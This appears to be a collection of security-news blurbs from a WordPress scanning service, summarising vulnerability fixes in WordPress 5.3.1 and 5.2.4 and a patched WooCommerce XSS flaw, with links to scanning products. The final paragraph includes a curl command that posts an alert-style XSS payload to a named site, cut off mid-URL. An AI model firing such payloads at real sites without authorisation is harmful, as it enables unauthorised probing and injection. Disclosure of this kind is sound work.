WordPress 5.3.1 is a security and maintenance release that has 46 fixes and enhancements. And even better, it fixes serval security problems found by the following people: Daniel Bachhuber for finding an issue where an unprivileged user could make a post sticky via the REST API. Simon Scannell of RIPS Technologies for finding and disclosing an issue where cross-site scripting (XSS) could be stored in well-crafted links. WordPress.org Security Team for hardening wp_kses_bad_protocol() to ensure that it is aware of the named colon attribute. Nguyen The Duc for discovering a stored XSS vulnerability using block editor content. Do a free scan at wpsec.com to check if your WordPress installation is safe.  

WordPress 5.2.4 is now available, it’s a short-cycle security release. The next major release will be version 5.3. This security release fixes six security issues. WordPress versions 5.2.3 and earlier are affected by these security bugs, which are fixed in version 5.2.4. There are also security updates to WordPress 5.1 and earlier. List of Security Fixes Ben Bidner of the WordPress Security Team who discovered issues related to referrer validation in the admin. Evan Ricafort for finding an issue where stored XSS (cross-site scripting) could be added via the Customizer. J.D. Grimes who found and disclosed a method of viewing unauthenticated posts. Weston Ruter for finding a way to create a stored XSS to inject Javascript into style tags. David Newman for highlighting[…]

  The popular WooCommerce WordPress plugin, used by 28 percent of all online stores, was just patched against a reflected cross-site scripting vulnerability (XSS). The vulnerability was found by the company SiteLock. The plugin vulnerability was disclosed to Automattic, the owner of, via its HackerOne security bounty program. The fix for the vulnerability was released on July 28th and if you use WPScans.com you can scan for this vulnerability or use our premium version and get an E-mail warning. The vulnerability can be tested with: curl -X POST -d “vendor_description=<script>alert(“xss”)</script>” “https://steelpress.org/index.php/product-vendor-registration-form/?confirm_email=1&email=1&firstname=1&lastname=1&location=1&register=Register&username=1&vendor_description=1&vendor_name=